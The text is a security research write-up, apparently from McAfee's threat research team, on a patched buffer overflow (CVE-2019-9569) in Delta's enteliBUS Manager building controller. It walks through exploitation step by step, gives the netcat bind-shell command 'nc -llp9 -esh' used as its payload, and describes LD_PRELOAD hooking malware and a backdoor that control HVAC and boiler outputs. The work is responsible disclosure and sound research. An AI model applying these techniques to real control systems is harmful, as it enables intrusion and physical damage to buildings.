We went back to the drawing board and acquired some additional hardware that the Delta device might realistically be charged with managing and had a certified technician program the device just as he would for a real-world client – in our case, as an HVAC controller. Our strategy quickly became what is often referred to as a replay attack. As an example, if we wanted to determine how to tell the device to flip a switch, we would first observe the device flipping the switch in the “normal” way and try to track down what code had to run for that to happen. Next, we would try to recreate those conditions by running that code manually, thus replaying the previously observed event. This strategy proved effective in granting us control over every category of device the eBMGR supports. Moreover, this method remains agnostic to the specific hardware attached to the building manager. Hypothetically, this sort of attack would work without any prior knowledge of the device’s configuration.

The result was an attack that would compromise any enteliBUS Manager on the same network and attach a custom piece of malware we developed to the software running on it. This malware would then create a backdoor which would allow the attacker to remotely issue commands to the manager and control any hardware connected to it, whether it be something as benign as a light switch or as dangerous as a boiler.

To make matters worse, if the attacker knows the IP address of the device ahead of time, this exploit can be performed over the Internet, increasing its impact exponentially. At the time of this writing, a Shodan scan revealed that over 1600 such devices are internet connected, meaning the danger is far from hypothetical.

For those craving the nitty-gritty technical details of how we went about accomplishing this, we also published what is arguably a novella here that delves into the vulnerability discovery and exploitation process from start to finish.

In keeping with our responsible disclosure program, we reached out to Delta Controls as soon as we confirmed that the initial vulnerability we discovered was exploitable. Shortly thereafter, they provided us with a beta version of a patch meant to fix the vulnerability and we confirmed that it did just that – our attack no longer worked. Furthermore, by using our understanding of how the attack is performed at a network level, we were able to add mitigation for this vulnerability to McAfee’s Network Security Platform (NSP) via NSP signature 0x45d43f00, helping our customers remain secure. This is our idea of a success story – researchers and vendors coming together to improve security for end users and ultimately reduce the attack surface for the adversary. If there’s any doubt they are interested in targets like these, a quick search will illuminate the myriad attempts to exploit industrial control systems as a top target of interest.

Before we leave you with “all’s well that ends well”, we want to stress that there is a lesson to be learned here: it doesn’t take much to make a critical system vulnerable. Thus, it is important that companies extend proper security practices to all network-connected devices – not just PCs. Such practices might include placing all internet-connected devices behind a firewall, monitoring traffic to these devices, segregating them from the rest of the network using VLANs, and staying on top of security updates. For critical systems that cannot afford significant downtime, updates are often pulled instead of pushed, putting the onus on end users to keep these devices up to date. Whatever the precise implementation may be, a good security policy often begins by adopting the principle of least privilege, or the idea that all access should be restricted by default unless there is a compelling reason for it. For example, before approaching the challenge of keeping a device like the eBMGR secure on the internet, it’s important to first ask if having it connected to internet is necessary in the first place.

While companies and consumers should certainly take the proper steps to keep their networks secure, manufacturers must also take a proactive approach towards addressing vulnerabilities that impact their end users. Delta Controls’ willingness to collaborate and timely response to our disclosure certainly seems like a step in the right direction. Please refer to the following statement from Delta Controls which provides insight into the collaboration with McAfee and the power of responsible disclosure.

The post From Building Control to Damage Control: A Case Study in Industrial Security Featuring Delta’s enteliBUS Manager appeared first on McAfee Blogs.

HVACking: Understanding the Delta Between Security and Reality

The McAfee Labs Advanced Threat Research team is committed to uncovering security issues in both software and hardware to help developers provide safer products for businesses and consumers. We recently investigated an industrial control system (ICS) produced by Delta Controls. The product, called “enteliBUS Manager”, is used for several applications, including building management. Our research into the Delta controller led to the discovery of an unreported buffer overflow in the “main.so” library. This flaw, identified by CVE-2019-9569, ultimately allows for remote code execution, which could be used by a malicious attacker to manipulate access control, pressure rooms, HVAC and more. We reported this research to Delta Controls on December 7th, 2018. Within just a few weeks, Delta responded, and we began an ongoing dialog while a security fix was built, tested and rolled out in late June of 2019. We commend Delta for their efforts and partnership throughout the entire process.

The vulnerable firmware version tested by McAfee’s Advanced Threat Research team is 3.40.571848. It is likely earlier versions of the firmware are also vulnerable, however ATR has not specifically tested these. We have confirmed the patched firmware version 3.40.612850 effectively remediates the vulnerability.

This blog is intended to provide a deep and thorough technical analysis of the vulnerability and its potential impact. For a high-level, non-technical walk through of this vulnerability, please refer to our summary blog post here.

Exploring the Attack Surface

The first task when researching a new device is to understand how it works from both a software and hardware perspective. Like many devices in the ICS realm, this device has three main software components; the bootloader, system applications, and user-defined programming. While looking at software for an attack vector is important, we do not focus on any surface which is defined by the users since this will potentially change for every install. Therefore, we want to focus on the bootloader and the system applications. With the operating system, it is common for manufacturers to implement custom code to operate the device regardless of an individual user’s programming. This custom code is often where most vulnerabilities exist and extends across the entire product install base. Yet, how do we access this code? As this is a critical system, the firmware and software are not publicly available and there is limited documentation. Thus, we are limited to external reconnaissance of the underlying system software. Since the most critical vulnerabilities are remote, it made sense to start with a simple network scan of the device. A TCP scan showed no ports open and a UDP scan only showed ports 47808 and 47809 to be open. Referring to the documentation, we determined this is most likely used for a protocol called Building Automation Control Network (BACnet). Using a BACnet-specific network enumeration script, we determined slightly more information:

root@kali:~# nmap –script bacnet-info -sU -p 47808 192.168.7.15

Starting Nmap 7.60 ( https://nmap.org ) at 2018-10-01 11:03 EDT
Nmap scan report for 192.168.7.15
Host is up (0.00032s latency).

PORT STATE SERVICE
47808/udp open bacnet
| bacnet-info: 
| Vendor ID: Delta Controls (8)
| Vendor Name: Delta Controls
| Object-identifier: 29000
| Firmware: 571848
| Application Software: V3.40
| Model Name: eBMGR-TCH

The next question is, what can we learn from the hardware? To answer this question, the device was first carefully disassembled, as shown in Figure 1.

Figure 1

The controller has one board to manage the display and a main baseboard which holds a System on a Module (SOM) chip containing both the processor and flash modules. With a closer look at the baseboard, we made a few key observations. First, the processor is an ARM926EJ core processor, the flash module is a ball grid array (BGA) chip, and there are several unpopulated headers on the board.

Figure 2

To examine the software more effectively, we needed to determine a method of extracting the firmware. The BGA chip used by the system for flash memory will mostly likely hold the firmware; however, this poses another challenge. Unlike other chips, BGA chips do not provide pins externally which can be attached to. This means to access the chip directly, we would need to desolder the chip from the board. This is not ideal since we risk damaging the system.

We also noticed several unpopulated headers on the board. This was promising as we could find an alternative method of exacting the firmware using one of these headers. Soldering pins to each of the unpopulated headers and using a logic analyzer, we determined that the 4-pin header in the center of the board is a universal asynchronous receiver-transmitter (UART) header running at a baud rate of 115200.

Figure 3

Using the Exodus XI Breakout board (shout out to @Logan_Brown and the Exodus team) to connect to the UART headers, we were met with an unprotected root prompt on the system. Now with full access to the system, we could start to gain a deeper understanding of how the system works and extract the firmware.

Figure 4

Firmware Extraction and System Analysis

With the UART interface, we could now explore the system in real-time, but how could we extract the firmware for offline analysis? The device has two USB ports which we were able to use to mount a USB drive. This allowed us to copy what is running in memory using dd onto a flash drive, effectively extracting the firmware. The next question was, what do we copy?

Using “/proc/mtd” to gain information about how memory is partitioned, we could see file systems located on mtd4 and mtd5. We used dd to copy off both the mtd4 and mtd5 partitions. We later discovered that one of the images is a backup used as a system fall back if a persistent issue is detected. This filesystem copied became increasingly useful as the project continued

With the active UART connection, it was now possible to investigate more about how the system is running. Since we were able to previously determine the device is only listening on ports 47808 and 47809, whichever application is listening on these ports would be the only point of an attack for a remote exploit. This was quickly confirmed using “netstat -nap” from the UART console.

We noticed that port 47808 was being used by an application called “dactetra”. With minimal further investigation, it was determined that this is a Delta-controller-specific binary was responsible for the main functions of the device.

Finding a Vulnerability

With a device-specific binary listening on the network via an open port, we had an ideal place to start looking for a vulnerability. We used the common approach of network fuzzing to start our investigation. To implement network fuzzing for BACnet, we turned to a tool produced by Synopsys called Defensics, which has a module designed for BACnet servers. Although this device is not a BACnet server and functions more as a router, this test suite provided several universal test cases which gave us a great place to start. BACnet utilizes several types of broadcast packets to communicate. Two such broadcast packets, “Who-Is” and “I-Am” packets, are universal to all BACnet devices and Defensics provides modules to work with them. Using the Defensics fuzzer to create mutations of these packets, we were able to observe the device encountering a failure point, producing a core dump and immediately rebooting, shown in Figure 5.

Figure 5

The test case which caused the crash was then isolated and run several more times to confirm the crash was repeatable. We discovered during this process that it takes an additional 96 packets sent after the original malformed packet to cause the crash. The malformed packet in the series was an “I-Am” packet, as seen below. The full packet is not shown due to its size.

Figure 6

Examining further, we could quickly see that the fuzzer created a packet with a BACnet layer size of 8216 bytes, using “0x22”. We could also see the fuzzer recognized the max acceptable size for the BACnet application layer as only 1476 bytes. Additional testing showed that sending only this packet did not produce the same results; only when all 97 packets were sent did the crash occur.

Analyzing the Crash

Since the system provides a core dump upon crashing, it was logical to analyze it for further information. From the core dump (reproduced in Figure 7), we could see the device encountered a segmentation fault. We also saw that register R0 contained what looked like data copied from our malformed packet, along with the backtrace being potentially corrupted.

Figure 7

The core dump also provided us the precise location of the crash. Using the memory map from the device, it was possible to determine that address 0x4026e580 is located in memcpy. Since the device does not deploy Address Space Layout Randomization (ASLR), the memory address did not change throughout our testing. As we had successfully extracted the firmware, we used IDA Pro to attempt to learn more about why this crash was occurring. The developers did not strip the binaries during compiling time, which helped simplify the reversing process in IDA.

Figure 8

The disassembly told us that memcpy was attempting to write what was in R3 to the “address” stored in R0. In this case, however, we had corrupted that address, causing the segmentation fault. The contents of several other registers also provided additional information. The value 0x81 in R3 was potentially the first byte of a BACnet packet from the BACnet Virtual Link Control (BVLC) layer, identifying the packet as BACnet. By looking at R3 and the values at the address in R5 together, we confirmed with more certainty that this was in fact the BVLC layer. This implied the data being copied was from the last packet sent and the destination for the copied data was taken from the first malformed packet. Registers R8 and R10 held the source and destination port numbers, respectively, which in this case were both 0xBAC0 (accounting for endianness), or 47808, the standard BACnet port. R4 held a memory address which, when examined, showed a section of memory that looks to have been overwritten. Here we saw data from our malformed packet (0x22); in some areas, memory was partially overwritten with our packet data. The value for the destination of the memcpy appeared to be coming from this region of memory. With no ASLR enabled, we could again count on this always landing in the same location.

Figure 9

At this point, with the information provided by the core dump, packets, and IDA, we were fairly certain that the crash found was a buffer overflow. However, memcpy is a very common function, so we needed to determine where exactly this crash was coming from. If the destination address for the memcpy was getting corrupted, then the crash in memcpy was simply collateral damage from the buffer overflow – so what code was causing the buffer overflow to occur? A good place to start this analysis would be the backtrace; however, as seen above, the backtrace was corrupted from our input. Since this device uses an ARM processor, we could look at the LR registers for clues on what code called this memcpy. Here, LR was pointing to 0x401e68a8 which, when referencing the memory map of the process, falls in “main.so”. After calculating the offset to use for static analysis, we arrived at the code in Figure 10.

Figure 10

The LR register was pointing to the instruction which is called after memcpy returns. In this case, we were interested in the instruction right before the address LR is pointing to, at offset 0x15C8A4. At first glance, we were surprised not to see the expected memcpy call; however, digging a little deeper into the scNetMove function we found that scNetMove is simply a wrapper for memcpy.

Figure 11

So, how did the wrong destination address get passed to memcpy? To answer this, we needed a better understanding of how the system processes incoming packets along with what code is responsible for setting up the buffers sent to memcpy. We can use ps to evaluate the system as it is running to see that the main process spawns 19 threads:

Table 1

The function wherein we found the “scNetMove” was called “scBIPRxTask” and was only referenced in one other location outside of the main binary; the initialization function for the application’s networking, shown in Figure 12.

Figure 12

In scBIPRxTask’s disassembly, we saw a new thread or “task” being created for both BACnet IP interfaces on ports 47808 and 47809. These spawned threads would handle all the incoming packets on their respective ports. When a packet would be received by the system, the thread responsible for scBIPRxTask would trigger for each packet. Using the IDA Pro decompiler, we could see what occurs for each packet. First, the function uses memset to zero out an allocated buffer on the stack and read from the network socket into this buffer. This buffer becomes the source for the following memcpy call. The new buffer is created with a static size of 1732 bytes and only 1732 bytes are appropriately read from the socket.

Figure 13

After reading data from the socket, the function sets up a place to store the packet it has just received. Here it uses a function called “pk_alloc,” which takes the size of the packet to create as its only argument. We noticed that the size was another static value and not the size received from the socket read function. This time the static value passed is 1476 bytes. This allocated buffer is what will become the destination for the memcpy.

Figure 14

With both a source and destination buffer allocated, “scNetMove” is called and subsequently memcpy is called, passing both buffers along with the size parameter taken from the socket read return value.

Figure 15

This code path explains why and how the vulnerability occurs. For each packet sent, it is copied off the stack into memory; however, if the packet is longer than 1476 bytes, for each byte over 1476 and less than or equal to 1732, that many bytes in memory past the end of the destination buffer are overwritten. Within the memory which is overwritten, there is an address to the destination of a later memcpy call. This means there is a buffer overflow vulnerability that leads to an arbitrary write condition. The first malformed packet overwrites a section of memory with attacker-defined data – in this case, the address where the attacker wishes to write to. After an additional 95 packets are read by the system, the address controlled by the attacker will be put into memcpy as the destination buffer. The data in the last packet, which does not need to be malformed, is what will be written to the location set in the earlier malformed packet. Assuming the last packet is also controlled by the attacker, this is now a write-what-where condition.

Kicking the Dog

With a firm grasp on the discovered vulnerability, the next logical step was to attempt to create a working exploit. When developing an exploit, the ability to dynamically debug the target is extremely valuable. To this end, the team first had to cross-compile debugging tools such as gdbserver for the device’s specific kernel and architecture. Since the device runs an old version of the Linux kernel, we used an old version of Buildroot to build gdbserver and later other applications.

Using a USB drive to transfer gdbserver onto the device, an initial attempt to debug the running application was made. A few seconds after connecting the debugger to the application, the device initiated a reboot, as shown in Figure 16.

 

Figure 16

An error message gave us a clue on why the crash occurred, indicating a watchdog timer failure. Watchdog timers are common in critical embedded devices that if the system hangs for a predetermined amount of time, it takes action to try and correct the problem. In this case, the action chosen by the developers is to reboot the system. Searching the system binaries for this error message revealed the section of code shown in Figure 17.  The actual error messages have been redacted at the request of the vendor.

 

Figure 17

The function is decrementing three counters. If any of the counters ever get to zero, then an error is thrown and later the system is rebooted. Examining the code further shows that multiple processes call this function to check the counters very frequently. This means we are not going to be able to dynamically debug the system without figuring out how to disable this software watchdog.

One common approach to this problem is to patch the binaries. It is important when looking at patching a binary to ensure the patch you employ does not introduce any unintended side effects. This generally means you want to make the smallest change possible. In this case, the smallest meaningful change the team came up with was to modify the “subtract by 5” to a “subtract by 0.”  This would not change how the overall program functioned; however, every time the function was called to decrement the counter, the counter would simply never get smaller. The patched code is provided in Figure 18. Notice the IDA decompiler has completely removed the subtraction statement from the code since it is no longer meaningful.

 

Figure 18

With the software watchdog patched, the team attempted to again dynamically debug the application. Initially the test was thought to be successful, since it was possible to connect to gdbserver and start debugging the application. However, after three minutes the system rebooted again. Figure 19 shows the message the team caught on reboot after several repeated experiments with the same results.

 

Figure 19

This indicates that in the boot phase of startup, a hardware watchdog is set to 180 seconds (or three minutes). The system has two watchdog timers, one hardware and one software; we had only disabled one of the timers. The same method of patching the binary which was used to disable the software watchdog timer would not work for the hardware watchdog timer; the application would also need to kick the watchdog to prevent a reboot. Armed with this knowledge, we turned to the Delta binaries on the device for code that could help us “kick” the hardware watchdog. With the debugging symbols left in, it was relatively easy to find a function which was responsible for managing the hardware watchdog.

There are several approaches which could be used to attempt to disable the hardware watchdog. In this scenario, we decided to take advantage of the fact that the code which dealt with the hardware watchdog was in a shared library and exported. This allowed for the creation of a new program using the existing watchdog-kicking code. By creating a second program that will kick the hardware watchdog, we could debug the Delta application without the system resetting.

This program was put in the init script of the system, so it would run on boot and continually “kick the dog”, effectively disabling the hardware watchdog. Note: no actual dogs were harmed in the research or creation of this exploit. If anything, they were given extra treats and contributed to the coding of the watchdog patch. Here are some very recent photos of this researcher’s dogs for proof.

 

Figure 20

With both the hardware and software watchdog timers pacified, we could continue to determine if our previously discovered vulnerability was exploitable.

Writing the Exploit

Before attempting exploitation, we wanted to first investigate if the system had any exploit mitigations or limitations we needed to be aware of. We began by running an open source script called “checksec.sh”. This script, when run on a binary, will report if any of the common exploit mitigations are in place. Figure 21 shows the script’s output when ran on the primary Delta binary, named “dactetra”.

Figure 21

The check came back with only NX enabled. This also held true for each of the shared libraries where the vulnerable code is located.

As discussed above, the vulnerability allows for a write-what-where condition, which leads us to the most important question: what do we want to write where? Ultimately, we want to write shellcode somewhere in memory and then jump to that shellcode. Since the attacker controls the last packet sent, it is plausible that the attacker could have their shellcode on the stack. If we put shellcode on the stack, we would then have to bypass the No eXecute (NX) protection discovered using the checksec tool. Although this is possible, we wondered if there was a simpler method.

Reexamining the crash dump at the memory location which has been overwritten by the large malformed packet, we found a small contiguous section of heap memory, totaling 32 bytes, which the attacker could control. We came to this conclusion because of the presence of 0x22 bytes – the contents of the malformed packet’s payload. At the time the overflow occurs, more of this region is filled with 0x22’s, but by the time our write-what-where condition is triggered, many of these bytes get clobbered, leaving us with the 32-byte section shown in Figure 22.

Figure 22

Being heap memory, this region was also executable, a detail that will become important shortly. Replacing the 0x22’s in the malformed packet with a non-repeating pattern both revealed where in the payload to place our shell code and confirmed that the bytes in this region were all unique.

With a potential place to put our shellcode, the next major component to address was controlling execution. The write-what-where condition allowed us to write anywhere in memory; however, it did not give us control of execution. One technique to tackle this problem is to leverage the Global Offset Table (GOT). In Linux, the GOT redirects a function pointer to an absolute location and is located in the .got section of an ELF executable or shared object. Since the .got section is written to at execution time, it is generally still writable later during execution. Relocation Read Only (RELRO) is an exploit mitigation which marks the loaded .got section read-only once it is mapped; however, as seen above, this protection was conveniently not enabled. This meant it was possible to use the write-what-were condition to write the address of our shellcode in memory to the GOT, replacing a function pointer of a future function call. Once the replaced function pointer is called, our shellcode would be executed.

But which function pointer should we replace? To ensure the highest probability of success, we decided it would be best to replace the pointer to a function that is called as close to the overwrite as possible. This is because we wanted to minimize changes to the memory layout during program execution. Examining the code again from the return of the “scNetMove” function, we see within just a few instructions “scDecodeBACnetUDP” is called. This therefore becomes the ideal choice of pointer to overwrite in the GOT.

Figure 23

Knowing what to write where, we next considered any conditions which needed to be met for the correct code path to be taken to trigger the vulnerability. Taking another look at the code in memcpy that allows the buffer overflow to occur, we noticed that the overwrite does indeed have a condition, as shown in Figure 24.

Figure 24

The code producing the overwrite in memory is only taken if the value in R0, when bitwise ANDed with the immediate value 3, is not equal to 0. From our crash dump, we knew that the value in R0 is the address of the destination we want to copy to. This potentially posed a problem. If the address we wanted to write to was 4-byte aligned, which was highly likely, the code path for our vulnerability would not be taken. We could ensure that our code path was taken by subtracting one from the address we wish to write to in the GOT and then repairing the last byte of the previous entry. This ensures that the correct code path is taken and that we do not unintentionally damage a second function pointer.

Shellcode

While we discovered a place to put our shellcode, we only discovered a very small amount of space, specifically 32 bytes, in which to write the payload, shown in Figure 24. What can we accomplish in such a small amount of space? One method that does not require extensive shellcode is to use a “return to libc” attack to execute the system command. For our exploit to work out of the box, whatever command or program we run with system must be present on the device by default. Additionally, the command string itself needs to be quite short to accommodate the limited number of bytes we have to work with.

An ideal scenario would be executing code that would allow remote shell access to the device. Fortunately, Netcat is present on the device and this version of Netcat supports both the “-ll” flag, for persistent listening on a port for a connection, and the “-e” flag, for executing a command on connection. Thus, we could use system to execute Netcat to listen on some port and execute a shell when a connection is made. Before writing shell code to execute system with this command, we first tested various Netcat commands on the device directly to determine the shortest Netcat command that would still give us a shell. After a few iterations, we were able to shorten the Netcat command to 13 bytes:

nc -llp9 -esh

Since the instructions must be 4-byte-aligned and we have 32 bytes to work with, we are only concerned with the length of the string rounded up to the nearest multiple of 4, so in this case 16 bytes. Subtracting this from our total 32 bytes, we have 16 bytes left, or 4 instructions total, to set up the argument for system and jump to it. A common method to fit more instructions into a small space in memory on ARM is to switch to Thumb mode. This is because ARM’s Thumb mode utilizes 16-bit (2-byte) instructions, instead of the regular 32-bit (4-byte) ARM instructions. Unfortunately, the processor on this device did not support Thumb mode and therefore this was not an option.

The challenge to accomplishing our task in only 4 ARM instructions is the limit ARM places on immediate values. To jump to system, we needed to use an immediate value as the address to jump to, but memory address are not generally small values. Immediate values in ARM are limited to 12 bits; eight of these bits are for the value itself and the other 4 are used for bit shifting. This means that an immediate value can only be one byte long (two hex digits) but that byte can be zero padded in any fashion you like. Therefore, loading a full memory address of 4 bytes using immediate values would take all 4 instructions, whether using MOV or ADD. While we do have 4 instructions to play with, we also need at least one instruction to load the address of our command string into R0, the register used as the first parameter for system, and at least one instruction to branch to the address, requiring a total of 6 instructions.

One way to reduce the number of instructions needed is to start by copying a register already containing a value close to the address we want at the time the shellcode executes. Whether this is feasible depends on the value of the address we want to jump to compared to the addresses we have available in the registers right before our shell code is executed.

Starting with the address we need to call, we discovered three address we could jump to that would call system.

  1. 0x4006425C – the address of a BL system (branch to system) instruction in boot.so.
  2. 0x40054510 – the address of the system entry in “boot.so”’s GOT.
  3. 0x402874A4 – the direct address of system in libuClibc-0.9.30.so.

Next, we compared these options to the values in the registers at the time the shellcode is about to execute using GDB, shown in Figure 25.

Figure 25

Of the registers we have access to at the time our shell code executes, the one that gives us the smallest delta between its contents and one of these three addresses we can use to call system is R4. R4 contains 0x40235CB4, giving a delta of 0x517F0 when compared to the address for a direct call to system. The last nibble being 0 is ideal since that means we don’t have to account for the last bit, thanks to the rotation mechanism inherent to ARM immediate values. This means that we only need two immediate values to convert the contents of R4 into our desired address: one for 0x51000, the other for 0x7F0. Since we can apply an immediate offset when MOV’ing one register into another, we should be able to load a register with the address of system in only two instructions. With one instruction for performing the branch and 16 bytes for the command string, this means we can get all our shell code in 32 bytes, assuming we can load R0 with the address of our string in one instruction.

By starting our ASCII string for the command directly after the fourth and last instruction, we can copy PC into R0 with the appropriate offset to make it point to the string. An added benefit of this approach is that it makes the string’s address independent of where the shell code is placed into memory, since it’s relative to PC. Figure 26 shows what the shellcode looks like with consideration for all restrictions.

Figure 26

It is important to note that the “.asciz” assembler directive is used to place a null-terminated ASCII string literal into memory. R12 was chosen as the register to contain the address of branch, since R12 is the Intra Procedural (IP) scratch space register on the ARM architecture. This means R12 is often used as a general-purpose register within subroutines indicating it is almost certainly safe to clobber for our purposes without experiencing unexpected adverse effects.

Piecing Everything Together

With a firm understanding of the vulnerability, exploit, and the shellcode needed we could now attempt exploitation. Looking at the sequence of packets used to cause this attack, it is not a single packet attack, but a multiple packet attack. The initial buffer overflow is contained in the large malformed packet, so what data do we build into it? This packet is overwriting memory but not providing control over execution; therefore, this can be considered the “setup” or “staging” packet. This is where memcpy will look for the address of the destination buffer for our last packet. The address we want to overwrite goes in this packet followed by our shellcode. As explained above, the address we are looking to overwrite is the address of the scDecodeBACnetUDP function pointer in the GOT minus one, to ensure the address isn’t 4-byte aligned. By repairing the last byte of the previous function pointer and overwriting this address, we can gain execution control.

The large malformed packet contains “where” we want to “write” to and puts our shellcode into memory yet does not contain “what” we want to write. The “what”, in this case, is the address of our shellcode, so our last packet needs to contain this address. The final challenge is deciding where in the last packet the address belongs.

Recall from the core dump shown previously that the crash happens on memcpy attempting to write the value 0x81 to the bad address. 0x81 is the first byte of the BVLC layer, indicating this where our address needs to go within the last packet to ensure that only the address we want is overwritten. We also need to ensure there are not any bytes after our address, otherwise we will continue to overwrite the GOT past our target address. Since this application is a multi-threaded application, this could cause the application to crash before our shellcode has a chance to execute. Since the BVLC layer is typically how a packet is identified as a BACnet packet, a potential problem with altering this layer is that the last packet will no longer look like a BACnet packet. If this is the case, will the application still ingest the packet? The team tested this and discovered that the application will ingest any broadcast packet regardless of type, since the vulnerable code is executed before the code that validates the packet type.

Taking everything into account and sending the series of 97 packets, we were able to successfully exploit the building manager by creating a bind shell. Below is a video demonstrating this attack:

A Real-world Scenario

Although providing a root shell to an attacker proves the vulnerability is exploitable, what can an attacker do with it? A shell by itself does not prove useful unless an attacker can control the normal operation of the system or steal valuable data. In this case, there is not a lot of useful data stored on the device. Someone could download information about how the system is configured or what it’s controlling, which may have some value, but this will not hold significant impact on its own. It is also plausible to delete essential system files via a denial-of-service attack that could easily put the target in an unusable state, but pure destruction is also of low value for various reasons. First, as mentioned previously, the device has a backup image that it will fall back to if a failure occurs during the boot process. Without physical access to the device, an attacker wouldn’t have a clear idea of how the backup image differs from the original or even if it is exploitable. If the backup image uses a different version of the firmware, the exploit may no longer work. Perhaps more importantly, a denial-of-service attack suffers from its inherent lack of subtlety. If the attack immediately causes alarms to go off when executed, the attacker can expect that their persistence in the system will be short-lived.

What if the system could be controlled by an attacker while being undetected?  This scenario becomes more concerning considering the type of environments controlled by this device.

Normal Programming

Controlling the standard functions of the device from just a root shell requires a much deeper understanding of how the device works in a normal setting. Typically, the Delta eBMGR is programmed by an installer to perform a specific set of tasks. These tasks can range from managing access control, to building lighting, to HVAC, and more. Once programmed, the controller is connected to several external input/output (I/O) modules. These modules are utilized for both controlling the state of an attached device and relaying information back to the manager. To replicate these “normal conditions”, we had a professional installer program our device with a sample program and attach the appropriate modules.

Figure 27 shows how each component is connected in our sample programming.  For our initial testing, we did not actually have the large items such as the pump, boiler and heating valve. The state of these items can be tracked through either LEDs on the modules or the touchscreen interface, hence it was unnecessary for us to acquire them for testing purposes. Despite this, it is still important to note which type of input or output each “device”, virtual or otherwise, is connected to on the modules.

Figure 27

The programming to control these devices is surprisingly simple. Essentially, based on the inputs, an output is rendered. Figure 28 shows the programming logic present on the device during our testing.

Figure 28

There are three user-defined software variables: “Heating System”, “Room Temp Spt”, and “Heating System Enable Spt”.  Here, “spt” indicates a set point. These can be defined by an operator at run time and help determine when an output should be turned on or off. The “Heating System” binary variable simply controls the on/off state of the system.

Controlling the Device

Like when we first started looking for vulnerabilities, we want to ensure our method of controlling the device is not dependent on code which could vary from controller to controller. Therefore, we want to find a method that allows us to control all the I/O devices attached to a Delta eBMGR, ensuring we are not dependent on this device’s specific programming.

As on any Linux-based system, the installer-defined programming at its lowest level utilizes system calls, or functions, to control the attached hardware. By finding a way to manipulate these functions, we would therefore have a universal method of controlling the modules regardless of the installer programming.  A very common way of gaining this type of control when you have root access to a system is through the use of function hooking. The first challenge for this approach is simply determining which function to hook. In our case, this required an extensive amount of reverse engineering and debugging of the system while it was running normally. To help reduce the scope of functions we needed to investigate, we began by focusing our attention on controlling binary output (BO). Our first challenge was how to find the code that handles changing the state of a binary output.

A couple of key factors helped point us in the right direction. First, the documentation for the controller indicates the devices talk to the I/O modules over a Controller Area Network Bus (CAN bus), which is common for PLC devices.  As previously seen, the Delta binaries all have symbols included.  Thus, we can use the function names provided in the binaries to help reduce the code surface we need to look at – IDA tells us there are only 28 functions with “canio” as the first part of their name. Second, we can assume that since changing the state of a BO requires a call to physical hardware, a Linux system call is needed to make that change. Since the device is making a change to an IO device, it is highly likely that the Linux system call used is “ioctl”. When cross-referencing the functions that start with “canio” and that call “ioctl”, our prior search space of 28 drops to 14. One function name stood out above the rest: “canioWriteOutput”. The decompiled version of the function has been reproduced in Figure 29.

Figure 29

Using this hypothesis, we set a break point on the call to “ioctl” inside canioWriteOutput and use the touchscreen to change the state of one of the binary outputs from “off” to “on”. Our breakpoint was hit! Single stepping over the breakpoint, we were able to see the correct LED light up, indicating the output was now on.

Now knowing the function we needed to hook, the question quickly became: How do we hook it? There are several methods to accomplish this task, but one of the simplest and most stable is to write a library that the main binary will load into memory during its startup process, using an environment variable called LD_PRELOAD. If a path or multiple paths to shared objects or libraries are set in LD_PRELOAD before executing a program, that program will load those libraries into its memory space before any other shared libraries. This is significant, because when Linux resolves a function call, it looks for function names in the order in which the libraries are loaded into memory. Therefore, if a function in the main Delta binary shares a name and signature with one defined in an attacker-generated library that is loaded first, the attacker-defined function will be executed in its place. As the attacker has a root shell on the device, it is possible for them to modify the init scripts to populate the LD_PRELOAD variable with a path to an attacker-generated library before starting the Delta software upon boot, essentially installing malware that executes upon reboot.

Using the cross-compile toolchain created in the early stages of the project, it was simple to test this theory with the “library” shown in Figure 30.

Figure 30

The code above doesn’t do anything meaningful, but it does confirm if hooking this method will work as expected.  We first defined a function pointer using the same function prototype we saw in IDA for canioWriteOutput.  When canioWriteOutput is called, our function will be called first, creating an output file in the “opt” directory and giving us a place to write text, proving that our hook is working. Then, we search the symbol table for the original “canioWriteObject” and call it with the same parameters passed into our hook, essentially creating a passthrough function. The success of this test confirmed this method would work.

For our function hook to do more than just act as a passthrough, we needed to understand what parameters were being passed to the function and how they affect execution. By using GDB, we could examine the data passed in during both the “on” and “off” states. For canioWriteObject, it was discovered that the state of binary output was encoded into the second parameter passed to the function. From there, we could theoretically control the state of the binary output by simply passing the desired state as the second parameter to the real function, leaving the other parameters as-is. In practice, however, the state change produced using this method persisted only for a split second before the device reset the output back to its proper state.

Why was the device returning the output to the correct state? Is there some type of protection in place? Investigating strings in the main Delta binary and the filesystem on the device led us to discover that the device software maintains databases on the filesystem, likely to preserve device and state information across reboots. At least one of these databases is used to store the state of binary outputs along with, presumably, other kinds of I/O devices. With further investigation using GDB, we discovered that the device is continuously polling this database for the state of any binary outputs and then calling canioWriteOutput to publish the state obtained from the database, clobbering whatever state was there before. Similarly, changes to this state made by a user via the touchscreen are stored in this same database. At first, it may appear that the simplest solution would be to change the database value since we have root access to the device. However, the database is not in a known standard format, meaning we would need to take the time to reverse this format and understand how the data is stored. As we already have a way to hook the functions, controlling the outputs at the time canioWriteOutput is called is simpler.

To accomplish this, we updated our malware to keep track of whether the attacker has made a modification to the output or not. If they have, the hook function replaces the correct state, stored in canioWriteOutput’s second parameter, with the state asserted by the attacker before calling the real canioWriteOutput function. Otherwise, the hook function acts as a simple passthrough for the real deal. A positive side effect of this, from the attacker’s perspective, is the touchscreen will show the output as the state the user last requested even after the malware has modified it. Implementing this simple state-tracking resolved our prior issue of the attacker-asserted state not persisting.

With control of the binary output, we moved on to looking at each of the other types of inputs and outputs that can be connected to the modules. We used a similar approach in identifying the methods used to read or write data from the modules and then hooking them. Unfortunately, not every function was as simple as canioWriteOutput. For example, when reversing the functions used to control analog outputs, we noticed that they utilized custom data structures to hold various information about the analog device, including its state. As a result, we had to first reverse the layout of these data structures to understand how the analog information was being sent to the outputs before we could modify their state. By using a combination of static and dynamic analysis, we were able to create a comprehensive malicious library to control the state of any device connected to the manager.

Taking our Malware to the Next Level

Although making changes from a root shell certainly proves that an attacker can control the device once it has been exploited, it is more practical and realistic for the attacker to have complete remote control not contingent on an active shell. Since we were already loading a library on startup to manipulate the I/O modules, we decided it would also be feasible to use that same library to create a command-and-control type infrastructure. This would allow an attacker to just send commands remotely to the “malware” without having to maintain a constant connection or shell access.

To bring this concept to life, we needed to create a backdoor and an initialization function was probably the best place to put one. After some digging, we found “canioInit”, a function responsible for initializing the CAN bus. Since the CAN bus is required to make any modifications to the operation of the device, it made sense to wait for this function to be called before starting our backdoor. Unlike some of the previous hooks mentioned, we don’t make any changes to this call or its return data; we only use it as a method to ensure our backdoor is started at the proper time.

Figure 31

